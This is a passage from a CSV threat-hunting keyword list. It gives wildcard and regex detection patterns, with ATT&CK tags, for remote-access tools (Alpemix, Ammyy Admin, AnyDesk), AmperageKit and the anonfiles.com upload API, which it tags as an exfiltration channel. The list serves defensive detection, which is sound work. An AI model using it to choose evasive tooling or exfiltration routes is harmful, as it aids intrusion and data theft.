TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*c5e68c5635bed872ce6ac0c2be5395cc15c2dbaa5f0052b86575cdd0b762902e*",".{0,1000}c5e68c5635bed872ce6ac0c2be5395cc15c2dbaa5f0052b86575cdd0b762902e.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A" "*serverinfo.alpemix.com*",".{0,1000}serverinfo\.alpemix\.com.{0,1000}","greyware_tool_keyword","Alpemix","connect to your unattended PC from anywhere","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.alpemix.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\aa_nts.dll*",".{0,1000}\\aa_nts\.dll.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by
attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AA_v3.exe*",".{0,1000}\\AA_v3\.exe.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AA_v3.log*",".{0,1000}\\AA_v3\.log.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AMMYY\access.log*",".{0,1000}\\AMMYY\\access\.log.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ControlSet001\Control\SafeBoot\Network\AmmyyAdmin_*",".{0,1000}\\ControlSet001\\Control\\SafeBoot\\Network\\AmmyyAdmin_.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\AMMYY\*",".{0,1000}\\ProgramData\\AMMYY\\.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Ammyy\Admin*",".{0,1000}\\SOFTWARE\\Ammyy\\Admin.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AA_v3.exe* -elevated*",".{0,1000}AA_v3\.exe.{0,1000}\s\-elevated.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*AA_v3.exe* -service -lunch*",".{0,1000}AA_v3\.exe.{0,1000}\s\-service\s\-lunch.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Ammyy Admin*",".{0,1000}Ammyy\sAdmin.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A" "*Ammyy LLC*",".{0,1000}Ammyy\sLLC.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rl.ammyy.com/*",".{0,1000}rl\.ammyy\.com\/.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 -
TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*SPR/Ammyy.R*",".{0,1000}SPR\/Ammyy\.R.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Win32.PUA.AmmyyAdmin*",".{0,1000}Win32\.PUA\.AmmyyAdmin.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*www.ammyy.com/files/v*",".{0,1000}www\.ammyy\.com\/files\/v.{0,1000}","greyware_tool_keyword","Ammyy Admin","Ammyy Admin is a remote desktop software application abused by attackers","T1021 - T1219 - T1563 - T1608","TA0002 - TA0008 - TA0011 - TA0040","N/A","N/A","RMM","https://www.ammyy.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Amperage.exe*",".{0,1000}\/Amperage\.exe.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","1","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*/AmperageKit.git*",".{0,1000}\/AmperageKit\.git.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","1","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z"
"*/AmperageKit/releases/*",".{0,1000}\/AmperageKit\/releases\/.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","1","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*\Amperage.exe*",".{0,1000}\\Amperage\.exe.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*\Amperage\Program.cs*",".{0,1000}\\Amperage\\Program\.cs.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*\Amperage_v2024.5.31_arm64.zip*",".{0,1000}\\Amperage_v2024\.5\.31_arm64\.zip.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*\Amperage_v2024.6.1_arm64.zip*",".{0,1000}\\Amperage_v2024\.6\.1_arm64\.zip.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & 
Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*\AmperageAIXSysRemove*",".{0,1000}\\AmperageAIXSysRemove.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*\AmperageHwReqDetour*",".{0,1000}\\AmperageHwReqDetour.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*\AmperageKit.sln*",".{0,1000}\\AmperageKit\.sln.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*\ProgramData\Amperage*",".{0,1000}\\ProgramData\\Amperage.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*327F3F26-182F-4E58-ABEA-A0CEDBCA0FCD*",".{0,1000}327F3F26\-182F\-4E58\-ABEA\-A0CEDBCA0FCD.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported 
devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#GUIDproject","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*3bdf7c5f0c87c94b461668137a3e7cbf757d59dafc7a063362c34d17f2f33e61*",".{0,1000}3bdf7c5f0c87c94b461668137a3e7cbf757d59dafc7a063362c34d17f2f33e61.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*7334543f2f3555690c9a4995cf1d8e83beb9fa45e6aa147c49114a4ef89670b8*",".{0,1000}7334543f2f3555690c9a4995cf1d8e83beb9fa45e6aa147c49114a4ef89670b8.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*75dce532b65a7c7644a626196a8af9d8370e163e802847505fb033a6290fb4a5*",".{0,1000}75dce532b65a7c7644a626196a8af9d8370e163e802847505fb033a6290fb4a5.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*7931404e96b6aff52bc81a852f1f545f0cd07712d648099ec0618f4e66a1807f*",".{0,1000}7931404e96b6aff52bc81a852f1f545f0cd07712d648099ec0618f4e66a1807f.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 
version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*80C7245C-B926-4CEB-BA5B-5353736137A8*",".{0,1000}80C7245C\-B926\-4CEB\-BA5B\-5353736137A8.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#GUIDproject","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*8e454334de0de74a6e53ee1d26e24cd2b0f41427922d9e92e6d49cf5db942a3c*",".{0,1000}8e454334de0de74a6e53ee1d26e24cd2b0f41427922d9e92e6d49cf5db942a3c.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*A3454AF1-12AF-4952-B26D-FF0930DB779E*",".{0,1000}A3454AF1\-12AF\-4952\-B26D\-FF0930DB779E.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#GUIDproject","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*Amperage - Recall setup tool for unsupported hardware*",".{0,1000}Amperage\s\-\sRecall\ssetup\stool\sfor\sunsupported\shardware.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - 
TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*cd1c54a8510c1e09d55868e12872aa54f9dc9ade95d70f08a173d29f6d676fde*",".{0,1000}cd1c54a8510c1e09d55868e12872aa54f9dc9ade95d70f08a173d29f6d676fde.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*d84efd06178700a83d135862d6c7419dce2e12df92c78850dc7cc5b1da482abd*",".{0,1000}d84efd06178700a83d135862d6c7419dce2e12df92c78850dc7cc5b1da482abd.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*ed0375afd9b26b18fd9b72bbb416dbf8bec289bf135facf4b7ba5cd2b1d86208*",".{0,1000}ed0375afd9b26b18fd9b72bbb416dbf8bec289bf135facf4b7ba5cd2b1d86208.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","#filehash","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*Removing AIX package from all standard users*",".{0,1000}Removing\sAIX\spackage\sfrom\sall\sstandard\susers.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 
- TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","0","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*thebookisclosed/AmperageKit*",".{0,1000}thebookisclosed\/AmperageKit.{0,1000}","greyware_tool_keyword","AmperageKit","enabling Recall in Windows 11 version 24H2 on unsupported devices","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/thebookisclosed/AmperageKit","1","1","N/A","N/A","8","4","366","23","2024-06-21T16:37:12Z","2024-05-30T23:00:45Z" "*https://anonfiles.com/*/*",".{0,1000}https\:\/\/anonfiles\.com\/.{0,1000}\/.{0,1000}","greyware_tool_keyword","anonfiles.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Collection","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*https://api.anonfiles.com/upload*",".{0,1000}https\:\/\/api\.anonfiles\.com\/upload.{0,1000}","greyware_tool_keyword","anonfiles.com","Interesting observation on the file-sharing platform preferences derived from the negotiations chats with LockBit victims","T1567 - T1022 - T1074 - T1105","TA0011 - TA0009 - TA0010 - TA0008","N/A","N/A","Data Exfiltration","https://twitter.com/mthcht/status/1660953897622544384","1","1","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*lklekjodgannjcccdlbicoamibgbdnmi*",".{0,1000}lklekjodgannjcccdlbicoamibgbdnmi.{0,1000}","greyware_tool_keyword","Anonymous Proxy Vpn Browser","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*/.anydesk/.anydesk.trace*",".{0,1000}\/\.anydesk\/\.anydesk\.trace.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*/.anydesk/service.conf*",".{0,1000}\/\.anydesk\/service\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*/.anydesk/system.conf*",".{0,1000}\/\.anydesk\/system\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*/.anydesk/user.conf*",".{0,1000}\/\.anydesk\/user\.conf.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - 
T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*/Anydesk.exe",".{0,1000}\/Anydesk\.exe","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","1","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*/Applications/Anydesk.app/*",".{0,1000}\/Applications\/Anydesk\.app\/.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*/etc/systemd/system/anydesk.service*",".{0,1000}\/etc\/systemd\/system\/anydesk\.service.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" 
"*/home/*/.anydesk/*",".{0,1000}\/home\/.{0,1000}\/\.anydesk\/.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*/log/anydesk.trace*",".{0,1000}\/log\/anydesk\.trace.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*/usr/bin/anydesk*",".{0,1000}\/usr\/bin\/anydesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*/usr/lib64/anydesk*",".{0,1000}\/usr\/lib64\/anydesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - 
MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*/usr/libexec/anydesk*",".{0,1000}\/usr\/libexec\/anydesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\adprinterpipe*",".{0,1000}\\adprinterpipe.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\AnyDesk (1).exe*",".{0,1000}\\AnyDesk\s\(1\)\.exe.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI","RMM","https://anydesk.com/","1","0","N/A","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A" "*\AnyDesk.exe*",".{0,1000}\\AnyDesk\.exe.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - 
